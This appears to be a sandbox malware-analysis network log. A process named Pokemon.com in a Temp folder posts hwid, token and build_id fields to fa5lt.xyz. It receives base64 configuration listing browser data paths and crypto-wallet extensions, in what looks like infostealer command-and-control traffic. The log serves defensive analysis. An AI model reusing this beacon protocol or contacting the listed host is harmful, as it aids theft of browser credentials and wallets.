                                                                                                                                                                                                                                                                                    Data Ascii: ------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="hwid"C492C145C7A6894617998-a33c7340-61ca------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCTRQ9R1VKF3EU3OZCT0--
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:47 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|e1d6e2869b01e5288d5e95125b4498c4|1|0|1|1|0|50000|10


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.549778116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:48 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----00RQI5FKFUSJMYU379R9
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------00RQI5FKFUSJMYU379R9Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:49 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.549784116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:50 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2D2DBIWLXBIE3EUK6PZ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 32 44 42 49 57 4c 58 42 49 45 33 45 55 4b 36 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 44 42 49 57 4c 58 42 49 45 33 45 55 4b 36 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 44 42 49 57 4c 58 42 49 45 33 45 55 4b 36 50 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------2D2DBIWLXBIE3EUK6PZ5Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------2D2DBIWLXBIE3EUK6PZ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------2D2DBIWLXBIE3EUK6PZ5Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:51 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.549790116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:53 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----5XB1VKX4WTRIMYC2D268
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:53 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 35 58 42 31 56 4b 58 34 57 54 52 49 4d 59 43 32 44 32 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 35 58 42 31 56 4b 58 34 57 54 52 49 4d 59 43 32 44 32 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 58 42 31 56 4b 58 34 57 54 52 49 4d 59 43 32 44 32 36 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------5XB1VKX4WTRIMYC2D268Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------5XB1VKX4WTRIMYC2D268Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5XB1VKX4WTRIMYC2D268Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:54 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.549796116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:55 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----LNY58Q9RQIE3E3OP8QIE
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 5657
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:55 UTC5657OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LNY58Q9RQIE3E3OP8QIECont
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.549798116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:56 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----P8GLX4OZU37YU3WL6P8Q
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:56 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 47 4c 58 34 4f 5a 55 33 37 59 55 33 57 4c 36 50 38 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P8GLX4OZU37YU3WL6P8QCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    8192.168.2.549814142.250.181.684432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:59 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NrCLyHar75l2T8Ab2Eax0g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC124INData Raw: 38 36 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 63 6f 6e 73 6f 6c 65 22 2c 22 6f 6b 63 20 74 68 75 6e 64 65 72 20 76 73 20 69 6e 64 69 61 6e 61 20 70 61 63 65 72 73 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 6b 65 76 69 6e 20 6d 63 63 61 6c 6c 69 73 74 65 72 22 2c 22 64 6f 6c 70 68 69 6e 20 73 74 61 6d 70 65 64 65 20 73 6f
                                                                                                                                                                                                                                                                                    Data Ascii: 866)]}'["",["nintendo switch console","okc thunder vs indiana pacers prediction","kevin mccallister","dolphin stampede so
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC1390INData Raw: 75 74 68 65 72 6e 20 63 61 6c 69 66 6f 72 6e 69 61 22 2c 22 6e 6f 72 74 68 65 61 73 74 20 6f 68 69 6f 20 61 69 72 20 71 75 61 6c 69 74 79 20 61 6c 65 72 74 22 2c 22 6e 61 73 61 20 61 73 74 72 6f 6e 61 75 74 73 20 73 74 75 63 6b 20 69 6e 20 73 70 61 63 65 22 2c 22 77 61 6c 6b 65 72 20 62 75 65 68 6c 65 72 20 72 65 64 20 73 6f 78 22 2c 22 67 69 6e 67 65 72 62 72 65 61 64 20 67 61 6c 61 20 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 72 65 77 61 72 64 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b
                                                                                                                                                                                                                                                                                    Data Ascii: uthern california","northeast ohio air quality alert","nasa astronauts stuck in space","walker buehler red sox","gingerbread gala monopoly go rewards"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC643INData Raw: 5a 54 51 31 4d 7a 65 45 5a 7a 54 48 41 33 53 7a 56 5a 4d 6e 46 53 54 6b 56 51 61 55 46 76 61 45 4a 53 51 30 64 45 5a 58 68 30 65 6a 5a 53 51 30 46 53 56 7a 42 7a 64 57 4e 45 56 44 46 5a 5a 56 5a 79 5a 54 63 34 53 6e 52 50 61 47 6f 77 64 6e 6f 34 63 6e 64 79 52 6a 41 35 61 6e 52 59 53 46 4a 76 65 45 64 52 53 6a 41 35 53 6b 55 78 54 30 78 54 61 30 64 58 4e 45 74 48 64 33 4e 52 55 6e 5a 35 4e 53 39 36 57 58 68 36 62 57 4e 61 56 32 6b 78 55 6d 78 48 62 57 70 71 4e 47 78 6f 54 53 74 7a 63 6d 46 58 57 46 4a 35 5a 33 68 74 56 47 64 6e 56 57 30 78 61 48 56 6c 64 6d 74 79 52 30 4a 6a 61 6d 4a 77 51 6d 56 6b 55 6c 5a 7a 62 46 6c 44 64 33 4e 4a 4d 45 52 4d 54 58 68 44 51 32 6c 46 52 6b 56 4a 59 32 4a 48 4e 6d 52 54 4e 47 31 58 56 33 70 45 5a 6d 4a 74 55 6b 46 6a 63
                                                                                                                                                                                                                                                                                    Data Ascii: ZTQ1MzeEZzTHA3SzVZMnFSTkVQaUFvaEJSQ0dEZXh0ejZSQ0FSVzBzdWNEVDFZZVZyZTc4SnRPaGowdno4cndyRjA5anRYSFJveEdRSjA5SkUxT0xTa0dXNEtHd3NRUnZ5NS96WXh6bWNaV2kxUmxHbWpqNGxoTStzcmFXWFJ5Z3htVGdnVW0xaHVldmtyR0JjamJwQmVkUlZzbFlDd3NJMERMTXhDQ2lFRkVJY2JHNmRTNG1XV3pEZmJtUkFjc
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC90INData Raw: 35 34 0d 0a 78 5a 46 64 73 5a 30 46 76 64 44 56 45 59 55 78 33 62 6c 56 30 4e 30 74 6a 56 48 64 4e 55 47 67 7a 61 6a 68 78 55 58 6c 73 52 6d 31 77 57 6c 70 61 55 32 4a 4c 54 46 67 76 5a 55 74 54 4b 31 70 73 63 31 52 6d 64 31 55 32 52 48 70 7a 5a 48 67 32 64 6d 39 0d 0a
